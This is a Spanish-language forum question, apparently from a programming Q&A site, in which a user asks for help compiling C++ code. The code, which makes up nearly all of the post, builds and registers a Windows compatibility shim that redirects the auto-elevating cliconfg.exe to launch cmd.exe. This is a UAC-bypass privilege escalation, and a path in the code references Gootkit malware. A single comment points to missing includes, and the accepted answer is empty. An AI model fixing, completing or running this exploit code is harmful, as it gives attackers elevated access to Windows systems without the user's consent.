# Problemas al compilar este programa C++

Tags: c++

Estoy intentando compilar el siguiente programa:

main.cpp:

```
#include <Windows.h>
#include "apphelp.h"

HMODULE hAppHelp;

pfnSdbCreateDatabase       pSdbCreateDatabase;
pfnSdbWriteDWORDTag        pSdbWriteDWORDTag;
pfnSdbWriteStringTag       pSdbWriteStringTag;
pfnSdbWriteBinaryTag       pSdbWriteBinaryTag;
pfnSdbEndWriteListTag      pSdbEndWriteListTag;
pfnSdbBeginWriteListTag      pSdbBeginWriteListTag;
pfnSdbCloseDatabaseWrite   pSdbCloseDatabaseWrite;

BOOL InitAppHelp()
{
   pSdbCreateDatabase = (pfnSdbCreateDatabase)GetProcAddress(hAppHelp, "SdbCreateDatabase");
   if (pSdbCreateDatabase == NULL)
      return FALSE;

   pSdbBeginWriteListTag = (pfnSdbBeginWriteListTag)GetProcAddress(hAppHelp, "SdbBeginWriteListTag");
   if (pSdbBeginWriteListTag == NULL)
      return FALSE;

   pSdbEndWriteListTag = (pfnSdbEndWriteListTag)GetProcAddress(hAppHelp, "SdbEndWriteListTag");
   if (pSdbEndWriteListTag == NULL)
      return FALSE;

   pSdbWriteStringTag = (pfnSdbWriteStringTag)GetProcAddress(hAppHelp, "SdbWriteStringTag");
   if (pSdbWriteStringTag == NULL)
      return FALSE;

   pSdbCloseDatabaseWrite = (pfnSdbCloseDatabaseWrite)GetProcAddress(hAppHelp, "SdbCloseDatabaseWrite");
   if (pSdbCloseDatabaseWrite == NULL)
      return FALSE;

   pSdbWriteBinaryTag = (pfnSdbWriteBinaryTag)GetProcAddress(hAppHelp, "SdbWriteBinaryTag");
   if (pSdbWriteBinaryTag == NULL)
      return FALSE;

   pSdbWriteDWORDTag = (pfnSdbWriteDWORDTag)GetProcAddress(hAppHelp, "SdbWriteDWORDTag");
   if (pSdbWriteDWORDTag == NULL)
      return FALSE;

   return TRUE;
}

BOOL RunProcess(LPWSTR lpszProcessName, LPWSTR lpszParameters)
{
   SHELLEXECUTEINFOW shinfo;
   RtlSecureZeroMemory(&shinfo, sizeof(shinfo));

   shinfo.cbSize = sizeof(shinfo);
   shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
   shinfo.lpFile = lpszProcessName;
   shinfo.lpParameters = lpszParameters;
   shinfo.lpDirectory = NULL;
   shinfo.nShow = SW_SHOW;
   return ShellExecuteExW(&shinfo);
}

BOOL DoFireworks(LPWSTR lpszPayloadEXE)
{
   PDB hShimDb;
   GUID dbGUID, exeGUID;
   WCHAR szTempDirectory[MAX_PATH];
   WCHAR szShimDbPath[MAX_PATH * 2];
   WCHAR szSdbinstPath[MAX_PATH * 2];
   WCHAR szSystemDirectory[MAX_PATH];

   TAGID tidDB = 0;
   TAGID tidEXE = 0;
   TAGID tidMatchFile = 0;
   TAGID tidShim = 0;
   TAGID tidLib = 0;

   if (lpszPayloadEXE == NULL)
      return FALSE;

   RtlSecureZeroMemory(szSdbinstPath, sizeof(szSdbinstPath));
   RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath));
   RtlSecureZeroMemory(szTempDirectory, sizeof(szTempDirectory));

   if (!GetSystemDirectoryW(szSystemDirectory, MAX_PATH)) {
      return FALSE;
   }
   wsprintfW(szSdbinstPath, L"%ws\\sdbinst.exe", szSystemDirectory);

/*
*  GUIDs are important, for both DATABASE and EXE file.
*  They used as shim identifiers and must to be set.
*/
   if (CoCreateGuid(&dbGUID) != S_OK)
      return FALSE;

   if (CoCreateGuid(&exeGUID) != S_OK)
      return FALSE;

   RtlSecureZeroMemory(szTempDirectory, MAX_PATH);
   RtlSecureZeroMemory(szShimDbPath, MAX_PATH * 2);

   if (!GetTempPathW(MAX_PATH, szTempDirectory))
      return FALSE;

#ifdef _DEBUG
   wsprintfW(szShimDbPath, L"Z:\\MAKEEXE\\shim_gootkit\\huy32.sdb");
#else
   wsprintfW(szShimDbPath, L"%wspe386.sdb", szTempDirectory);
#endif

   hShimDb = pSdbCreateDatabase(szShimDbPath, DOS_PATH);
   if (hShimDb == NULL)
      return FALSE;

   //write shim DB header
   tidDB = pSdbBeginWriteListTag(hShimDb, TAG_DATABASE);
   if (tidDB != TAGID_NULL) {

      pSdbWriteStringTag(hShimDb, TAG_NAME, L"pe386");
      pSdbWriteDWORDTag(hShimDb, TAG_OS_PLATFORM, 0x1); //win32 only RedirectEXE
      pSdbWriteBinaryTag(hShimDb, TAG_DATABASE_ID, (PBYTE)&dbGUID, sizeof(GUID));

      //just as ACT 5.6 does
      tidLib = pSdbBeginWriteListTag(hShimDb, TAG_LIBRARY);
      if (tidLib != TAGID_NULL) pSdbEndWriteListTag(hShimDb, tidLib);

      //write shim task information
      tidEXE = pSdbBeginWriteListTag(hShimDb, TAG_EXE);
      if (tidEXE != TAGID_NULL) {
         pSdbWriteStringTag(hShimDb, TAG_NAME, L"cliconfg.exe");
         pSdbWriteStringTag(hShimDb, TAG_APP_NAME, L"cliconfg.exe");
         pSdbWriteStringTag(hShimDb, TAG_VENDOR, L"Microsoft");
         pSdbWriteBinaryTag(hShimDb, TAG_EXE_ID, (PBYTE)&exeGUID, sizeof(GUID));

         //write shim target info
         tidMatchFile = pSdbBeginWriteListTag(hShimDb, TAG_MATCHING_FILE);
         if (tidMatchFile != TAGID_NULL) {
            pSdbWriteStringTag(hShimDb, TAG_NAME, L"*"); //<-from any
            pSdbWriteStringTag(hShimDb, TAG_COMPANY_NAME, L"Microsoft Corporation");
            pSdbWriteStringTag(hShimDb, TAG_INTERNAL_NAME, L"cliconfg.exe");
            pSdbEndWriteListTag(hShimDb, tidMatchFile);
         }

         //write shim action info
         tidShim = pSdbBeginWriteListTag(hShimDb, TAG_SHIM_REF);
         if (tidShim != TAGID_NULL) {
            pSdbWriteStringTag(hShimDb, TAG_NAME, L"RedirectEXE");
            pSdbWriteStringTag(hShimDb, TAG_COMMAND_LINE, lpszPayloadEXE);
            pSdbEndWriteListTag(hShimDb, tidShim);
         }
         pSdbEndWriteListTag(hShimDb, tidEXE);
      }
      pSdbEndWriteListTag(hShimDb, tidDB);
   }
   pSdbCloseDatabaseWrite(hShimDb);

   //register shim, sdbinst.exe
   if (RunProcess(szSdbinstPath, szShimDbPath)) {
      wsprintfW(szTempDirectory, L"%ws\\cliconfg.exe", szSystemDirectory);
      RunProcess(szTempDirectory, NULL);
   }
   return TRUE;
}

void __cdecl main()
{
   WCHAR szTemp[MAX_PATH * 2];

   hAppHelp = LoadLibraryExW(APPHELPLIB, NULL, LOAD_LIBRARY_SEARCH_SYSTEM32); //2533623
   if (hAppHelp == NULL) {
      ExitProcess(1);
      return;
   }

   if (!InitAppHelp()) {
      ExitProcess(2);
      return;
   }
   RtlSecureZeroMemory(szTemp, sizeof(szTemp));

   //create and register shim with RedirectEXE, cmd.exe as payload
   lstrcpyW(szTemp, L"%systemroot%\\system32\\cmd.exe");
   if (!DoFireworks(szTemp)) {
      ExitProcess(3);
      return;
   }
   FreeLibrary(hAppHelp);
   ExitProcess(0);
}
```

apphelp.h:

```
#define APPHELPLIB L"apphelp.dll"

typedef DWORD TAGID;
typedef DWORD TAGREF;
typedef DWORD TAG;
typedef PVOID PDB;
typedef HANDLE HSDB;

#define HID_DOS_PATHS         0x00000001
#define HID_DATABASE_FULLPATH   0x00000002
#define SDB_MAX_EXES               16
#define SDB_MAX_LAYERS                8
#define SDB_MAX_SDBS               16
#define SDB_DATABASE_SHIM      0x00010000
#define SHIMREG_DISABLE_SHIM   0x00000001
#define SHIMREG_DISABLE_APPHELP 0x00000002
#define SHIMREG_APPHELP_NOUI   0x00000004
#define SHIMREG_APPHELP_CANCEL   0x10000000
#define SHIMREG_DISABLE_SXS      0x00000010
#define SHIMREG_DISABLE_LAYER   0x00000020
#define SHIMREG_DISABLE_DRIVER   0x00000040
#define ATTRIBUTE_AVAILABLE 0x00000001
#define ATTRIBUTE_FAILED 0x00000002
#define TAGID_ROOT 0
#define TAGID_NULL 0
#define TAG_TYPE_NULL 0x1000
#define TAG_TYPE_BYTE 0x2000
#define TAG_TYPE_WORD 0x3000
#define TAG_TYPE_DWORD 0x4000
#define TAG_TYPE_QWORD 0x5000
#define TAG_TYPE_STRINGREF 0x6000
#define TAG_TYPE_LIST 0x7000
#define TAG_TYPE_STRING 0x8000
#define TAG_TYPE_BINARY 0x9000
#define TAG_DATABASE (0x1 | TAG_TYPE_LIST) //Database entry.
#define TAG_LIBRARY (0x2 | TAG_TYPE_LIST) //Library entry.
#define TAG_INEXCLUDE (0x3 | TAG_TYPE_LIST) //Include and exclude entry.
#define TAG_SHIM (0x4 | TAG_TYPE_LIST) //Shim entry that contains the name and purpose information.
#define TAG_PATCH (0x5 | TAG_TYPE_LIST) //Patch entry that contains the in-memory patching information.
#define TAG_APP (0x6 | TAG_TYPE_LIST) //Application entry.
#define TAG_EXE (0x7 | TAG_TYPE_LIST) //Executable entry.
#define TAG_MATCHING_FILE (0x8 | TAG_TYPE_LIST) //Matching file entry.
#define TAG_SHIM_REF (0x9| TAG_TYPE_LIST) //Shim definition entry.
#define TAG_PATCH_REF (0xA | TAG_TYPE_LIST) //Patch definition entry.
#define TAG_LAYER (0xB | TAG_TYPE_LIST) // Layer shim entry.
#define TAG_FILE (0xC | TAG_TYPE_LIST) //File attribute used in a shim entry.
#define TAG_APPHELP (0xD | TAG_TYPE_LIST) //Apphelp information entry.
#define TAG_LINK (0xE | TAG_TYPE_LIST) //Apphelp online link information entry.
#define TAG_DATA (0xF | TAG_TYPE_LIST) //Name-value mapping entry.
#define TAG_MSI_TRANSFORM (0x10 | TAG_TYPE_LIST) //MSI transformation entry.
#define TAG_MSI_TRANSFORM_REF (0x11 | TAG_TYPE_LIST) //MSI transformation definition entry.
#define TAG_MSI_PACKAGE (0x12 | TAG_TYPE_LIST) //MSI package entry.
#define TAG_FLAG (0x13 | TAG_TYPE_LIST) //Flag entry.
#define TAG_MSI_CUSTOM_ACTION (0x14 | TAG_TYPE_LIST) //MSI custom action entry.
#define TAG_FLAG_REF (0x15 | TAG_TYPE_LIST) //Flag definition entry.
#define TAG_ACTION  (0x16 | TAG_TYPE_LIST) //Unused.
#define TAG_LOOKUP (0x17 | TAG_TYPE_LIST) //Lookup entry used for lookup in a driver database.
#define TAG_STRINGTABLE (0x801 | TAG_TYPE_LIST) // String table entry.
#define TAG_INDEXES (0x802 | TAG_TYPE_LIST) // Indexes entry that defines all the indexes in a shim database.
#define TAG_INDEX   (0x803 | TAG_TYPE_LIST) // Index entry that defines an index in a shim database.
#define TAG_NAME (0x1 | TAG_TYPE_STRINGREF)  //Name attribute.
#define TAG_DESCRIPTION (0x2 | TAG_TYPE_STRINGREF)  //Description entry.
#define TAG_MODULE (0x3 | TAG_TYPE_STRINGREF)  //Module attribute.
#define TAG_API (0x4 | TAG_TYPE_STRINGREF)  //API entry.
#define TAG_VENDOR (0x5 | TAG_TYPE_STRINGREF)  //Vendor name attribute.
#define TAG_APP_NAME (0x6 | TAG_TYPE_STRINGREF)  //Application name attribute that describes an application entry in a shim database.
#define TAG_COMMAND_LINE (0x8 | TAG_TYPE_STRINGREF)  //Command line attribute that is used when passing arguments to a shim, for example.
#define TAG_COMPANY_NAME (0x9 | TAG_TYPE_STRINGREF)  //Company name attribute.
#define TAG_DLLFILE (0xA | TAG_TYPE_STRINGREF)  //DLL file attribute for a shim entry.
#define TAG_WILDCARD_NAME (0xB | TAG_TYPE_STRINGREF)  //Wildcard name attribute for an executable entry with a wildcard as the file name.
#define TAG_PRODUCT_NAME (0x10 | TAG_TYPE_STRINGREF)  //Product name attribute.
#define TAG_PRODUCT_VERSION (0x11 | TAG_TYPE_STRINGREF)  //Product version attribute.
#define TAG_FILE_DESCRIPTION (0x12 | TAG_TYPE_STRINGREF)  //File description attribute.
#define TAG_FILE_VERSION (0x13 | TAG_TYPE_STRINGREF)  //File version attribute.
#define TAG_ORIGINAL_FILENAME (0x14 | TAG_TYPE_STRINGREF)  //Original file name attribute.
#define TAG_INTERNAL_NAME (0x15 | TAG_TYPE_STRINGREF)  //Internal file name attribute.
#define TAG_LEGAL_COPYRIGHT (0x16 | TAG_TYPE_STRINGREF)  //Copyright attribute.
#define TAG_16BIT_DESCRIPTION (0x17 | TAG_TYPE_STRINGREF)  //16-bit description attribute.
#define TAG_APPHELP_DETAILS (0x18 | TAG_TYPE_STRINGREF)  //Apphelp details message information attribute.
#define TAG_LINK_URL (0x19 | TAG_TYPE_STRINGREF)  //Apphelp online link URL attribute.
#define TAG_LINK_TEXT (0x1A | TAG_TYPE_STRINGREF)  //Apphelp online link text attribute.
#define TAG_APPHELP_TITLE (0x1B | TAG_TYPE_STRINGREF)  //Apphelp title attribute.
#define TAG_APPHELP_CONTACT (0x1C | TAG_TYPE_STRINGREF)  //Apphelp vendor contact attribute.
#define TAG_SXS_MANIFEST (0x1D | TAG_TYPE_STRINGREF)  //Side-by-side manifest entry.
#define TAG_DATA_STRING (0x1E | TAG_TYPE_STRINGREF)  //String attribute for a data entry.
#define TAG_MSI_TRANSFORM_FILE (0x1F | TAG_TYPE_STRINGREF)  //File name attribute of an MSI transformation entry.
#define TAG_16BIT_MODULE_NAME (0x20 | TAG_TYPE_STRINGREF)  //16-bit module name attribute.
#define TAG_LAYER_DISPLAYNAME (0x21 | TAG_TYPE_STRINGREF)  //Unused.
#define TAG_COMPILER_VERSION (0x22 | TAG_TYPE_STRINGREF)  //Shim database compiler version.
#define TAG_ACTION_TYPE (0x23 | TAG_TYPE_STRINGREF)  //Unused.
#define TAG_EXPORT_NAME (0x24 | TAG_TYPE_STRINGREF)  //Export file name attribute.
#define TAG_SIZE (0x1 | TAG_TYPE_DWORD)  //File size attribute.
#define TAG_OFFSET (0x2 | TAG_TYPE_DWORD)  //Unused.
#define TAG_CHECKSUM (0x3 | TAG_TYPE_DWORD)  //File checksum attribute.
#define TAG_SHIM_TAGID (0x4 | TAG_TYPE_DWORD)  //Shim TAGID attribute.
#define TAG_PATCH_TAGID (0x5 | TAG_TYPE_DWORD)  //Patch TAGID attribute.
#define TAG_MODULE_TYPE (0x6 | TAG_TYPE_DWORD)  //Module type attribute.
#define TAG_VERDATEHI (0x7 | TAG_TYPE_DWORD)  //High-order portion of the file version date attribute.
#define TAG_VERDATELO (0x8 | TAG_TYPE_DWORD)  //Low-order portion of the file version date attribute.
#define TAG_VERFILEOS (0x9 | TAG_TYPE_DWORD)  //Operating system file version attribute.
#define TAG_VERFILETYPE (0xA | TAG_TYPE_DWORD)  //File type attribute.
#define TAG_PE_CHECKSUM (0xB | TAG_TYPE_DWORD)  //PE file checksum attribute.
#define TAG_PREVOSMAJORVER (0xC | TAG_TYPE_DWORD)  //Major operating system version attribute.
#define TAG_PREVOSMINORVER (0xD | TAG_TYPE_DWORD)  //Minor operating system version attribute.
#define TAG_PREVOSPLATFORMID (0xE | TAG_TYPE_DWORD)  //Operating system platform identifier attribute.
#define TAG_PREVOSBUILDNO (0xF | TAG_TYPE_DWORD)  //Operating system build number attribute.
#define TAG_PROBLEMSEVERITY (0x10 | TAG_TYPE_DWORD)  //Block attribute of an Apphelp entry. This determines whether the application is hard or soft blocked.
#define TAG_LANGID (0x11 | TAG_TYPE_DWORD)  //Language identifier of an Apphelp entry.
#define TAG_VER_LANGUAGE (0x12 | TAG_TYPE_DWORD)  //Language version attribute of a file.
#define TAG_ENGINE (0x14 | TAG_TYPE_DWORD)  //Unused.
#define TAG_HTMLHELPID (0x15 | TAG_TYPE_DWORD)  //Help identifier attribute for an Apphelp entry.
#define TAG_INDEX_FLAGS (0x16 | TAG_TYPE_DWORD)  //Flags attribute for an index entry.
#define TAG_FLAGS (0x17 | TAG_TYPE_DWORD)  //Flags attribute for an Apphelp entry.
#define TAG_DATA_VALUETYPE (0x18 | TAG_TYPE_DWORD)  //Data type attribute for a data entry.
#define TAG_DATA_DWORD (0x19 | TAG_TYPE_DWORD)  //DWORD value attribute for a data entry.
#define TAG_LAYER_TAGID (0x1A | TAG_TYPE_DWORD)  //Layer shim TAGID attribute.
#define TAG_MSI_TRANSFORM_TAGID (0x1B | TAG_TYPE_DWORD)  //MSI transform TAGID attribute.
#define TAG_LINKER_VERSION (0x1C | TAG_TYPE_DWORD)  //Linker version attribute of a file.
#define TAG_LINK_DATE (0x1D | TAG_TYPE_DWORD)  //Link date attribute of a file.
#define TAG_UPTO_LINK_DATE (0x1E | TAG_TYPE_DWORD)  //Link date attribute of a file. Matching is done up to and including this link date.
#define TAG_OS_SERVICE_PACK (0x1F | TAG_TYPE_DWORD)  //Operating system service pack attribute for an executable entry.
#define TAG_FLAG_TAGID (0x20 | TAG_TYPE_DWORD)  //Flags TAGID attribute.
#define TAG_RUNTIME_PLATFORM (0x21 | TAG_TYPE_DWORD)  //Run-time platform attribute of a file.
#define TAG_OS_SKU (0x22 | TAG_TYPE_DWORD)  //Operating system SKU attribute for an executable entry.
#define TAG_OS_PLATFORM (0x23 | TAG_TYPE_DWORD)  //Operating system platform attribute.
#define TAG_APP_NAME_RC_ID (0x24 | TAG_TYPE_DWORD)  //Application name resource identifier attribute for Apphelp entries.
#define TAG_VENDOR_NAME_RC_ID (0x25 | TAG_TYPE_DWORD)  //Vendor name resource identifier attribute for Apphelp entries.
#define TAG_SUMMARY_MSG_RC_ID (0x26 | TAG_TYPE_DWORD)  //Summary message resource identifier attribute for Apphelp entries.
#define TAG_VISTA_SKU (0x27 | TAG_TYPE_DWORD)  //Windows Vista SKU attribute.
#define TAG_DESCRIPTION_RC_ID (0x28 | TAG_TYPE_DWORD)  //Description resource identifier attribute for Apphelp entries.
#define TAG_PARAMETER1_RC_ID (0x29 | TAG_TYPE_DWORD)  //Parameter1 resource identifier attribute for Apphelp entries.
#define TAG_TAGID (0x801 | TAG_TYPE_DWORD)  //TAGID attribute.
#define TAG_STRINGTABLE_ITEM (0x801 | TAG_TYPE_STRING)  //String table item entry.
#define TAG_INCLUDE (0x1 | TAG_TYPE_NULL)  //Include list entry.
#define TAG_GENERAL (0x2 | TAG_TYPE_NULL)  //General purpose shim entry.
#define TAG_MATCH_LOGIC_NOT (0x3 | TAG_TYPE_NULL)  //NOT of matching logic entry.
#define TAG_APPLY_ALL_SHIMS (0x4 | TAG_TYPE_NULL)  //Unused.
#define TAG_USE_SERVICE_PACK_FILES (0x5 | TAG_TYPE_NULL)  //Service pack information for Apphelp entries.
#define TAG_MITIGATION_OS (0x6 | TAG_TYPE_NULL)  //Mitigation at operating system scope entry.
#define TAG_BLOCK_UPGRADE (0x7 | TAG_TYPE_NULL)  //Upgrade block entry.
#define TAG_INCLUDEEXCLUDEDLL (0x8 | TAG_TYPE_NULL)  //DLL include/exclude entry.
#define TAG_TIME (0x1 | TAG_TYPE_QWORD)  //Time attribute.
#define TAG_BIN_FILE_VERSION (0x2 | TAG_TYPE_QWORD)  //Bin file version attribute for file entries.
#define TAG_BIN_PRODUCT_VERSION (0x3 | TAG_TYPE_QWORD)  //Bin product version attribute for file entries.
#define TAG_MODTIME (0x4 | TAG_TYPE_QWORD)  //Unused.
#define TAG_FLAG_MASK_KERNEL (0x5 | TAG_TYPE_QWORD)  //Kernel flag mask attribute.
#define TAG_UPTO_BIN_PRODUCT_VERSION (0x6 | TAG_TYPE_QWORD)  //Bin product version attribute of a file. Matching is done up to and including this product version.
#define TAG_DATA_QWORD (0x7 | TAG_TYPE_QWORD)  //ULONGLONG value attribute for a data entry.
#define TAG_FLAG_MASK_USER (0x8 | TAG_TYPE_QWORD)  //User flag mask attribute.
#define TAG_FLAGS_NTVDM1 (0x9 | TAG_TYPE_QWORD)  //NTVDM1 flag mask attribute.
#define TAG_FLAGS_NTVDM2 (0xA | TAG_TYPE_QWORD)  //NTVDM2 flag mask attribute.
#define TAG_FLAGS_NTVDM3 (0xB | TAG_TYPE_QWORD)  //NTVDM3 flag mask attribute.
#define TAG_FLAG_MASK_SHELL (0xC | TAG_TYPE_QWORD)  //Shell flag mask attribute.
#define TAG_UPTO_BIN_FILE_VERSION (0xD | TAG_TYPE_QWORD)  //Bin file version attribute of a file. Matching is done up to and including this file version.
#define TAG_FLAG_MASK_FUSION (0xE | TAG_TYPE_QWORD)  //Fusion flag mask attribute.
#define TAG_FLAG_PROCESSPARAM (0xF | TAG_TYPE_QWORD)  //Process param flag attribute.
#define TAG_FLAG_LUA (0x10 | TAG_TYPE_QWORD)  //LUA flag attribute.
#define TAG_FLAG_INSTALL (0x11 | TAG_TYPE_QWORD)  //Install flag attribute.
#define TAG_PATCH_BITS (0x2 | TAG_TYPE_BINARY)  //Patch file bits attribute.
#define TAG_FILE_BITS (0x3 | TAG_TYPE_BINARY)  //File bits attribute.
#define TAG_EXE_ID (0x4 | TAG_TYPE_BINARY)  //GUID attribute of an executable entry.
#define TAG_DATA_BITS (0x5 | TAG_TYPE_BINARY)  //Data bits attribute.
#define TAG_MSI_PACKAGE_ID (0x6 | TAG_TYPE_BINARY)  //MSI package identifier attribute of an MSI package.
#define TAG_DATABASE_ID (0x7 | TAG_TYPE_BINARY)  //GUID attribute of a database.
#define TAG_INDEX_BITS (0x801 | TAG_TYPE_BINARY)  //Index bits attribute.

#define TAG_APP_ID (0x11 | TAG_TYPE_BINARY) // App id guid?
#define TAG_FIX_ID (0x10 | TAG_TYPE_BINARY) // undocumented

#define TAG_MATCH_MODE (0x1 | TAG_TYPE_WORD)  //Match mode attribute.
#define TAG_TAG (0x801 | TAG_TYPE_WORD)  //TAG entry.
#define TAG_INDEX_TAG (0x802 | TAG_TYPE_WORD)  //Index TAG attribute for an index entry.
#define TAG_INDEX_KEY (0x803 | TAG_TYPE_WORD)  //Index key attribute for an index entry.

typedef struct tagAPPHELP_DATA {
   DWORD  dwFlags;
   DWORD  dwSeverity;
   DWORD  dwHTMLHelpID;
   LPTSTR szAppName;
   TAGREF trExe;
   LPTSTR szURL;
   LPTSTR szLink;
   LPTSTR szAppTitle;
   LPTSTR szContact;
   LPTSTR szDetails;
   DWORD  dwData;
   BOOL   bSPEntry;
} APPHELP_DATA, *PAPPHELP_DATA;

typedef struct tagATTRINFO {
   TAG   tAttrID;
   DWORD dwFlags;
   union {
      ULONGLONG ullAttr;
      DWORD     dwAttr;
      TCHAR     *lpAttr;
   };
} ATTRINFO, *PATTRINFO;

typedef struct _FIND_INFO {
   TAGID     tiIndex;
   TAGID     tiCurrent;
   TAGID     tiEndIndex;
   TAG       tName;
   DWORD     dwIndexRec;
   DWORD     dwFlags;
   ULONGLONG ullKey;
   union {
      LPCTSTR szName;
      DWORD   dwName;
      GUID    *pguidName;
   };
} FIND_INFO, *PFIND_INFO;

typedef DWORD INDEXID;

typedef enum _PATH_TYPE {
   DOS_PATH,
   NT_PATH
} PATH_TYPE;

typedef struct tagSDBQUERYRESULT {
   TAGREF atrExes[SDB_MAX_EXES];
   DWORD  adwExeFlags[SDB_MAX_EXES];
   TAGREF atrLayers[SDB_MAX_LAYERS];
   DWORD  dwLayerFlags;
   TAGREF trApphelp;
   DWORD  dwExeCount;
   DWORD  dwLayerCount;
   GUID   guidID;
   DWORD  dwFlags;
   DWORD  dwCustomSDBMap;
   GUID   rgGuidDB[SDB_MAX_SDBS];
} SDBQUERYRESULT, *PSDBQUERYRESULT;


#define PATCH_MATCH 0x4
#define PATCH_REPLACE 0x2
#define MAX_MODULE   32
typedef struct _PATCHBITS
{
   DWORD opcode;
   DWORD actionSize;
   DWORD patternSize;
   DWORD rva;
   DWORD unknown;
   WCHAR  moduleName[MAX_MODULE];
   BYTE pattern[ANYSIZE_ARRAY];
} PATCHBITS, *PPATCHBITS;

//functions
typedef BOOL(WINAPI *pfnBaseFlushAppcompatCache)(void);
typedef TAGID(WINAPI *pfnSdbBeginWriteListTag)(PDB pdb, TAG tTag);
typedef void (WINAPI *pfnSdbCloseDatabase)(PDB pdb);
typedef void (WINAPI *pfnSdbCloseDatabaseWrite)(PDB pdb);
typedef BOOL(WINAPI *pfnSdbCommitIndexes)(PDB pdb);
typedef PDB(WINAPI *pfnSdbCreateDatabase)(LPCWSTR pwszPath, PATH_TYPE eType);
typedef BOOL(WINAPI *pfnSdbDeclareIndex)(PDB pdb, TAG tWhich, TAG tKey, DWORD dwEntries, BOOL bUniqueKey, INDEXID *piiIndex);
typedef BOOL(WINAPI *pfnSdbEndWriteListTag)(PDB pdb, TAGID tiList);
typedef TAGID(WINAPI *pfnSdbFindFirstDWORDIndexedTag)(PDB pdb, TAG tWhich, TAG tKey, DWORD dwName, FIND_INFO *pFindInfo);
typedef TAGID(WINAPI *pfnSdbFindFirstTag)(PDB pdb, TAGID tiParent, TAG tTag);
typedef TAGID(WINAPI *pfnSdbFindNextTag)(PDB pdb, TAGID tiParent, TAGID tiPrev);
typedef BOOL(WINAPI *pfnSdbFormatAttribute)(PATTRINFO pAttrInfo, LPTSTR pchBuffer, DWORD dwBufferSize);
typedef BOOL(WINAPI *pfnSdbFreeFileAttributes)(PATTRINFO pFileAttributes);
typedef void (WINAPI *pfnSdbGetAppPatchDir)(HSDB hSDB, LPTSTR szAppPatchPath, DWORD cchSize);
typedef PVOID(WINAPI *pfnSdbGetBinaryTagData)(PDB pdb, TAGID tiWhich);
typedef BOOL(WINAPI *pfnSdbGetFileAttributes)(LPCTSTR lpwszFileName, PATTRINFO *ppAttrInfo, LPDWORD lpdwAttrCount);
typedef TAGID(WINAPI *pfnSdbGetFirstChild)(PDB pdb, TAGID tiParent);
typedef TAGID(WINAPI *pfnSdbGetIndex)(PDB pdb, TAG tWhich, TAG tKey, LPDWORD lpdwFlags);
typedef BOOL(WINAPI *pfnSdbGetMatchingExe)(HSDB hSDB, LPCTSTR szPath, LPCTSTR szModuleName, LPCTSTR pszEnvironment, DWORD dwFlags, PSDBQUERYRESULT pQueryResult);
typedef TAGID(WINAPI *pfnSdbGetNextChild)(PDB pdb, TAGID tiParent, TAGID tiPrev);
typedef LPTSTR(WINAPI *pfnSdbGetStringTagPtr)(PDB pdb, TAGID tiWhich);
typedef TAG(WINAPI *pfnSdbGetTagFromTagID)(PDB pdb, TAGID tiWhich);
typedef HSDB(WINAPI *pfnSdbInitDatabase)(DWORD dwFlags, LPCTSTR pszDatabasePath);
typedef BOOL(WINAPI *pfnSdbIsStandardDatabase)(GUID GuidDB);
typedef ULONGLONG(WINAPI *pfnSdbMakeIndexKeyFromString)(LPCTSTR pwszKey);
typedef PDB(WINAPI *pfnSdbOpenApphelpDetailsDatabase)(LPCWSTR pwsDetailsDatabasePath);
typedef HMODULE(WINAPI *pfnSdbOpenApphelpResourceFile)(LPCWSTR pwszACResourceFile);
typedef PDB(WINAPI *pfnSdbOpenDatabase)(LPCTSTR pwszPath, PATH_TYPE eType);
typedef DWORD(WINAPI *pfnSdbQueryDataExTagID)(PDB pdb, TAGID tiExe, LPCTSTR lpszDataName, LPDWORD lpdwDataType, LPVOID lpBuffer, LPDWORD lpcbBufferSize, TAGID *ptiData);
typedef BOOL(WINAPI *pfnSdbReadApphelpDetailsData)(PDB pdb, PAPPHELP_DATA pData);
typedef BOOL(WINAPI *pfnSdbReadBinaryTag)(PDB pdb, TAGID tiWhich, PBYTE pBuffer, DWORD dwBufferSize);
typedef DWORD(WINAPI *pfnSdbReadDWORDTag)(PDB pdb, TAGID tiWhich, DWORD dwDefault);
typedef DWORD(WINAPI *pfnSdbReadWORDTag)(PDB pdb, TAGID tiWhich, WORD dwDefault);
typedef ULONGLONG(WINAPI *pfnSdbReadQWORDTag)(PDB pdb, TAGID tiWhich, ULONGLONG qwDefault);
typedef BOOL(WINAPI *pfnSdbReadStringTag)(PDB pdb, TAGID tiWhich, LPTSTR pwszBuffer, DWORD cchBufferSize);
typedef BOOL(WINAPI *pfnSdbRegisterDatabaseEx)(LPCTSTR pszDatabasePath, DWORD dwDatabaseType, PULONGLONG pTimeStamp);
typedef void (WINAPI *pfnSdbReleaseDatabase)(HSDB hSDB);
typedef void (WINAPI *pfnSdbReleaseMatchingExe)(HSDB hSDB, TAGREF trExe);
typedef BOOL(WINAPI *pfnSdbStartIndexing)(PDB pdb, INDEXID iiWhich);
typedef BOOL(WINAPI *pfnSdbStopIndexing)(PDB pdb, INDEXID iiWhich);
typedef BOOL(WINAPI *pfnSdbTagRefToTagID)(HSDB hSDB, TAGREF trWhich, PDB *ppdb, TAGID *ptiWhich);
typedef LPCTSTR(WINAPI *pfnSdbTagToString)(TAG tag);
typedef BOOL(WINAPI *pfnSdbUnregisterDatabase)(GUID *pguidDB);
typedef BOOL(WINAPI *pfnSdbWriteBinaryTag)(PDB pdb, TAG tTag, PBYTE pBuffer, DWORD dwSize);
typedef BOOL(WINAPI *pfnSdbWriteBinaryTagFromFile)(PDB pdb, TAG tTag, LPCWSTR pwszPath);
typedef BOOL(WINAPI *pfnSdbWriteDWORDTag)(PDB pdb, TAG tTag, DWORD dwData);
typedef BOOL(WINAPI *pfnSdbWriteNULLTag)(PDB pdb, TAG tTag);
typedef BOOL(WINAPI *pfnSdbWriteQWORDTag)(PDB pdb, TAG tTag, ULONGLONG qwData);
typedef BOOL(WINAPI *pfnSdbWriteStringTag)(PDB pdb, TAG tTag, LPCWSTR pwszData);
typedef BOOL(WINAPI *pfnSdbWriteWORDTag)(PDB pdb, TAG tTag, WORD wData);
typedef BOOL(WINAPI *pfnShimFlushCache)(HWND hwnd, HINSTANCE hInstance, LPCSTR lpszCmdLine, int nCmdShow);
typedef BOOL(WINAPI *pfnSdbGetTagDataSize)(PDB pdb, TAG tTag);
typedef DWORD(WINAPI* pfnSdbGetShowDebugInfoOption)();
```

Pero obtengo los siguientes errores:

[image: errores]

¿Alguna sugerencia sobre cómo resolverlos?

Comment: Es muy probable que te falten varios `#include`, además de el retorno de `main` y devolver valores en funciones que esperan que se devuelva un valor.

Answer (score 0, accepted):

